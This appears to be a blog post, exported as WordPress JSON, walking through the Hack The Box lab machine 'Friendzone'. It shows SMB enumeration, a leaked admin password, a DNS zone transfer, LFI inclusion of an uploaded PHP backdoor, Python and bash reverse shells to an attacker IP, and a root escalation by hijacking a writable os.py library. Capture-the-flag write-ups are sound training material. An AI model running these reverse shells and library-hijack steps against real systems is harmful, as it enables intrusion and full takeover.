{"id":1534,"date":"2021-09-03T18:33:06","date_gmt":"2021-09-03T18:33:06","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1534"},"modified":"2021-09-03T18:33:06","modified_gmt":"2021-09-03T18:33:06","slug":"friendzone","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/03\/friendzone\/","title":{"rendered":"Friendzone"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Level<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/173\" title=\"Friendzone\">Friendzone<\/a> - HTB<\/td>\n<td>Medium<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/85202d08993c628f3b90a7c4299a4019.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code>Unfortunately, I forgot to save this in my notes... But as far as I remember, SMB, 443 and 53 were open.<\/code><\/pre>\n<p>Note to self: after seeing SMB, an nmap script scan should also be run.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500#   nmap --script smb-enum-shares.nse -p445 10.10.10.123\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-08-31 15:00 EDT\nNmap scan report for friendzone.red (10.10.10.123)\nHost is up (0.071s latency).\n\nPORT    STATE SERVICE\n445\/tcp open  microsoft-ds\n\nHost script results:\n| smb-enum-shares: \n|   account_used: guest\n|   \\\\10.10.10.123\\Development: \n|     Type: STYPE_DISKTREE\n|     Comment: FriendZone Samba Server Files\n|     Users: 1\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\etc\\Development\n|     Anonymous access: READ\/WRITE\n|     Current user access: READ\/WRITE\n|   \\\\10.10.10.123\\Files: \n|     Type: STYPE_DISKTREE\n|     Comment: FriendZone 
Samba Server Files \/etc\/Files\n|     Users: 0\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\etc\\hole\n|     Anonymous access: &lt;none&gt;\n|     Current user access: &lt;none&gt;\n|   \\\\10.10.10.123\\IPC$: \n|     Type: STYPE_IPC_HIDDEN\n|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))\n|     Users: 1\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\tmp\n|     Anonymous access: READ\/WRITE\n|     Current user access: READ\/WRITE\n|   \\\\10.10.10.123\\general: \n|     Type: STYPE_DISKTREE\n|     Comment: FriendZone Samba Server Files\n|     Users: 0\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\etc\\general\n|     Anonymous access: READ\/WRITE\n|     Current user access: READ\/WRITE\n|   \\\\10.10.10.123\\print$: \n|     Type: STYPE_DISKTREE\n|     Comment: Printer Drivers\n|     Users: 0\n|     Max Users: &lt;unlimited&gt;\n|     Path: C:\\var\\lib\\samba\\printers\n|     Anonymous access: &lt;none&gt;\n|_    Current user access: &lt;none&gt;\n\nNmap done: 1 IP address (1 host up) scanned in 18.13 seconds<\/code><\/pre>\n<p>Next, let's continue with enum4linux.<\/p>\n<pre><code class=\"language-sh\">\nStarting smbmap scan\n\n    ----                                                    ----------- -------\n    print$                                              NO ACCESS   Printer Drivers\n    Files                                               NO ACCESS   FriendZone Samba Server Files \/etc\/Files\n    general                                             READ ONLY   FriendZone Samba Server Files\n    Development                                         READ, WRITE FriendZone Samba Server Files\n    IPC$                                                NO ACCESS   IPC Service (FriendZone server (Samba, Ubuntu))\n<\/code><\/pre>\n<p>I found a creds.txt file.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# smbclient -W 
&#039;WORKGROUP&#039; \/\/&#039;10.10.10.123&#039;\/&#039;general&#039; -U&#039;&#039;%&#039;&#039;\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Wed Jan 16 15:10:51 2019\n  ..                                  D        0  Wed Jan 23 16:51:02 2019\n  creds.txt                           N       57  Tue Oct  9 19:52:42 2018\n\n        9221460 blocks of size 1024. 6410736 blocks available\nsmb: \\&gt; get creds.txt\ngetting file \\creds.txt of size 57 as creds.txt (0.2 KiloBytes\/sec) (average 0.2 KiloBytes\/sec)\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# cat creds.txt                      \ncreds for the admin THING:\n\nadmin:WORKWORKHhallelujah@#\n<\/code><\/pre>\n<p>Since port 53 was open, I tried a DNS zone transfer.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# host -l &quot;friendzone.red&quot;  10.10.10.123\nUsing domain server:\nName: 10.10.10.123\nAddress: 10.10.10.123#53\nAliases: \n\nfriendzone.red has IPv6 address ::1\nfriendzone.red name server localhost.\nfriendzone.red has address 127.0.0.1\nadministrator1.friendzone.red has address 127.0.0.1\nhr.friendzone.red has address 127.0.0.1\nuploads.friendzone.red has address 127.0.0.1<\/code><\/pre>\n<p>I then added these to \/etc\/hosts and continued. While enumerating SMB, we had identified the path of the Development share. At the same time, at the address:<\/p>\n<pre><code>https:\/\/administrator1.friendzone.red\/dashboard.php?image_id=a.jpg&amp;pagename=&lt;LFI&gt; <\/code><\/pre>\n<p>I found an LFI. We have write access to the Development path and we have an LFI. 
So we can get a reverse shell.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# smbclient -W &#039;WORKGROUP&#039; \/\/&#039;10.10.10.123&#039;\/&#039;Development&#039; -U&#039;&#039;%&#039;&#039; \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Tue Aug 31 16:14:31 2021\n  ..                                  D        0  Wed Jan 23 16:51:02 2019\n\n        9221460 blocks of size 1024. 6460340 blocks available\nsmb: \\&gt; put simple-backdoor.php\nputting file simple-backdoor.php as \\simple-backdoor.php (1.5 kb\/s) (average 1.5 kb\/s)\nsmb: \\&gt; ls\n  .                                   D        0  Tue Aug 31 16:15:29 2021\n  ..                                  D        0  Wed Jan 23 16:51:02 2019\n  simple-backdoor.php                 A      328  Tue Aug 31 16:15:29 2021\n\n        9221460 blocks of size 1024. 6460336 blocks available\nsmb: \\&gt; <\/code><\/pre>\n<pre><code class=\"language-sh\">https:\/\/administrator1.friendzone.red\/dashboard.php?image_id=a.jpg&amp;pagename=\/etc\/Development\/simple-backdoor<\/code><\/pre>\n<p>On visiting this address, I got a reverse shell with the payload <code>python -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code>.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/FriendZOne]\n\u2514\u2500# nc -lvp 1111                                         \nlistening on [any] 1111 ...\nconnect to [10.10.14.4] from friendzone.red [10.10.10.123] 59346\nwww-data@FriendZone:\/var\/www\/admin$ id\nid\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@FriendZone:\/var\/www\/admin$ cd \/home\ncd 
\/home\nwww-data@FriendZone:\/home$ ls\nls\nfriend\nwww-data@FriendZone:\/home$ cd friend\ncd friend\nwww-data@FriendZone:\/home\/friend$ ls\nls\nuser.txt\nwww-data@FriendZone:\/home\/friend$ cat user.txt\ncat user.txt\na9ed20acecd6c5b6b52f474e15ae9a11<\/code><\/pre>\n<p>During information gathering, I saw Python libraries among the files we can write to.<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Interesting writable files owned by me or writable by everyone (not in Home) (max 500)\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#writable-files\n\/dev\/mqueue\n\/dev\/shm\n\/etc\/Development\n\/etc\/Development\/simple-backdoor.php\n\/etc\/sambafiles\n\/home\/friend\n\/run\/lock\n\/run\/user\/1000\n\/run\/user\/1000\/gnupg\n\/run\/user\/1000\/systemd\n\/tmp\n\/tmp\/.font-unix\n\/tmp\/.ICE-unix\n\/tmp\/linpeas.sh\n\/tmp\/result1\n\/tmp\/.Test-unix\n#)You_can_write_even_more_files_inside_last_directory\n\n\/usr\/lib\/python2.7\n\/usr\/lib\/python2.7\/os.py\n\/usr\/lib\/python2.7\/os.pyc\n\/var\/lib\/php\/sessions\n\/var\/mail\/friend\n\/var\/spool\/samba\n\/var\/tmp\n<\/code><\/pre>\n<p>I ran .\/pspy32s to watch what was going on.<\/p>\n<pre><code class=\"language-sh\">\nfriend@FriendZone:\/tmp$ .\/pspy32s \npspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855\n\n     \u2588\u2588\u2593\u2588\u2588\u2588    \u2588\u2588\u2588\u2588\u2588\u2588  \u2588\u2588\u2593\u2588\u2588\u2588 \u2593\u2588\u2588   \u2588\u2588\u2593\n    \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588    \u2592 \u2593\u2588\u2588\u2591  \u2588\u2588\u2592\u2592\u2588\u2588  \u2588\u2588\u2592\n    \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2591 \u2593\u2588\u2588\u2584   \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592 \u2592\u2588\u2588 \u2588\u2588\u2591\n    \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592  \u2592   
\u2588\u2588\u2592\u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592 \u2591 \u2590\u2588\u2588\u2593\u2591\n    \u2592\u2588\u2588\u2592 \u2591  \u2591\u2592\u2588\u2588\u2588\u2588\u2588\u2588\u2592\u2592\u2592\u2588\u2588\u2592 \u2591  \u2591 \u2591 \u2588\u2588\u2592\u2593\u2591\n    \u2592\u2593\u2592\u2591 \u2591  \u2591\u2592 \u2592\u2593\u2592 \u2592 \u2591\u2592\u2593\u2592\u2591 \u2591  \u2591  \u2588\u2588\u2592\u2592\u2592 \n    \u2591\u2592 \u2591     \u2591 \u2591\u2592  \u2591 \u2591\u2591\u2592 \u2591     \u2593\u2588\u2588 \u2591\u2592\u2591 \n    \u2591\u2591       \u2591  \u2591  \u2591  \u2591\u2591       \u2592 \u2592 \u2591\u2591  \n                   \u2591           \u2591 \u2591     \n                               \u2591 \u2591     \n\nConfig: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [\/usr \/tmp \/etc \/home \/var \/opt] (recursive) | [] (non-recursive)\nDraining file system events due to startup...\ndone\n2021\/09\/01 00:23:43 CMD: UID=0    PID=98     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=9      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=89     | \n2021\/09\/01 00:23:43 CMD: UID=107  PID=862    | \/usr\/sbin\/exim4 -bd -q30m \n2021\/09\/01 00:23:43 CMD: UID=0    PID=854    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=853    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=852    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=85     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=82     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=81     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=80     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=8      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=79     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=78     | \n2021\/09\/01 00:23:43 CMD: UID=0    
PID=77     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=711    | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=7      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=6      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=577    | \/usr\/sbin\/nmbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=5498   | \/usr\/bin\/gpg-agent --supervised \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=54384  | .\/pspy32s \n2021\/09\/01 00:23:43 CMD: UID=0    PID=54344  | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=54301  | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=54230  | \n2021\/09\/01 00:23:43 CMD: UID=33   PID=488    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=487    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=486    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=485    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=33   PID=484    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=0    PID=482    | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=0    PID=478    | \/sbin\/agetty -o -p -- \\u --noclear tty1 linux \n2021\/09\/01 00:23:43 CMD: UID=0    PID=469    | \/usr\/sbin\/vsftpd \/etc\/vsftpd.conf \n2021\/09\/01 00:23:43 CMD: UID=0    PID=465    | \/usr\/sbin\/sshd -D \n2021\/09\/01 00:23:43 CMD: UID=109  PID=458    | \/usr\/sbin\/named -f -4 -u bind \n2021\/09\/01 00:23:43 CMD: UID=0    PID=4      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=397    | \/usr\/bin\/VGAuthService \n2021\/09\/01 00:23:43 CMD: UID=103  PID=391    | \/usr\/bin\/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only \n2021\/09\/01 00:23:43 CMD: UID=102  PID=390    | \/usr\/sbin\/rsyslogd -n \n2021\/09\/01 00:23:43 CMD: UID=0    PID=389    | \/lib\/systemd\/systemd-logind \n2021\/09\/01 00:23:43 CMD: UID=0    PID=383    | \/usr\/sbin\/cron -f \n2021\/09\/01 00:23:43 CMD: 
UID=0    PID=381    | \/usr\/bin\/python3 \/usr\/bin\/networkd-dispatcher --run-startup-triggers \n2021\/09\/01 00:23:43 CMD: UID=0    PID=380    | \/usr\/lib\/accountsservice\/accounts-daemon \n2021\/09\/01 00:23:43 CMD: UID=0    PID=35     | \n2021\/09\/01 00:23:43 CMD: UID=62583 PID=346    | \/lib\/systemd\/systemd-timesyncd \n2021\/09\/01 00:23:43 CMD: UID=101  PID=345    | \/lib\/systemd\/systemd-resolved \n2021\/09\/01 00:23:43 CMD: UID=0    PID=34     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=32     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=30     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=29     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=28     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=27     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=26     | \n2021\/09\/01 00:23:43 CMD: UID=100  PID=254    | \/lib\/systemd\/systemd-networkd \n2021\/09\/01 00:23:43 CMD: UID=0    PID=253    | \/lib\/systemd\/systemd-udevd \n2021\/09\/01 00:23:43 CMD: UID=0    PID=25     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=24     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=23     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=228    | \/usr\/bin\/vmtoolsd \n2021\/09\/01 00:23:43 CMD: UID=0    PID=227    | \/lib\/systemd\/systemd-journald \n2021\/09\/01 00:23:43 CMD: UID=0    PID=22     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=21     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=20     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=2      | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=196    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=195    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=19     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=18     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=174    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=173    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=172    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=170    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=17     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=169    | \n2021\/09\/01 00:23:43 CMD: UID=0    
PID=168    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=16     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=15     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=14     | \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1321   | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1301   | -bash \n2021\/09\/01 00:23:43 CMD: UID=0    PID=13     | \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1299   | sshd: friend@pts\/1   \n2021\/09\/01 00:23:43 CMD: UID=0    PID=1273   | sshd: friend [priv]  \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1258   | bash \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1248   | (sd-pam) \n2021\/09\/01 00:23:43 CMD: UID=1000 PID=1247   | \/lib\/systemd\/systemd --user \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1246   | su friend \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1223   | \/bin\/bash \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1222   | python -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;) \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1221   | sh -c python -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.4&quot;,1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/bash&quot;)&#039; \n2021\/09\/01 00:23:43 CMD: UID=33   PID=1206   | \/usr\/sbin\/apache2 -k start \n2021\/09\/01 00:23:43 CMD: UID=0    PID=12     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=1195   | \/usr\/sbin\/smbd --foreground --no-process-group \n2021\/09\/01 00:23:43 CMD: UID=0    PID=115    | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=11     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=10     | \n2021\/09\/01 00:23:43 CMD: UID=0    PID=1      | \/sbin\/init splash \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54394  | \/usr\/bin\/python \/opt\/server_admin\/reporter.py \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54393  
| \/bin\/sh -c \/opt\/server_admin\/reporter.py \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54392  | \/usr\/sbin\/CRON -f \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54396  | bash \/tmp\/shell.sh \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54395  | sh -c bash \/tmp\/shell.sh \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54397  | bash \/tmp\/shell.sh \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54402  | \/bin\/sh \/usr\/bin\/lesspipe \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54401  | \/bin\/sh \/usr\/bin\/lesspipe \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54400  | bash -i \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54406  | dircolors -b \n2021\/09\/01 00:24:01 CMD: UID=0    PID=54405  | bash -i <\/code><\/pre>\n<pre><code>2021\/09\/01 00:24:01 CMD: UID=0    PID=54394  | \/usr\/bin\/python \/opt\/server_admin\/reporter.py <\/code><\/pre>\n<p>Now let's manipulate this file.<\/p>\n<pre><code class=\"language-sh\">\nfriend@FriendZone:\/tmp$ cat shell.sh \nbash -i &gt;&amp; \/dev\/tcp\/10.10.14.4\/1234 0&gt;&amp;1<\/code><\/pre>\n<pre><code class=\"language-sh\">\nfriend@FriendZone:\/tmp$ tail \/usr\/lib\/python2.7\/os.py\ntry:\n    _copy_reg.pickle(statvfs_result, _pickle_statvfs_result,\n                     _make_statvfs_result)\nexcept NameError: # statvfs_result may not exist\n    pass\n\nsystem(&quot;bash \/tmp\/shell.sh&quot;)\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# nc -lvp 1234\nlistening on [any] 1234 ...\nconnect to [10.10.14.4] from friendzone.red [10.10.10.123] 49692\nbash: cannot set terminal process group (54393): Inappropriate ioctl for device\nbash: no job control in this shell\nroot@FriendZone:~# id\nid\nuid=0(root) gid=0(root) groups=0(root)\nroot@FriendZone:~# cd \/root\ncd \/root\nroot@FriendZone:~# ls\nls\ncerts\nroot.txt\nroot@FriendZone:~# cat root.txt\ncat root.txt\nb0e6c60b82cf96e9855ac1656a9e90c7\nroot@FriendZone:~# 
\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Level OS Logo Friendzone &#8211; HTB Medium Linux Walkthrough nmap scan: Unfortunately, I forgot to save this in my notes&#8230; But as far as I remember, SMB, 443 and 53&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/03\/friendzone\/\">Read more<span class=\"screen-reader-text\">Friendzone<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1534","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1534","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1534"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1534\/revisions"}],"predecessor-version":[{"id":1535,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1534\/revisions\/1535"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1534"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1534"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1534"}],"curies":[{"name":"wp","hr
ef":"https:\/\/api.w.org\/{rel}","templated":true}]}}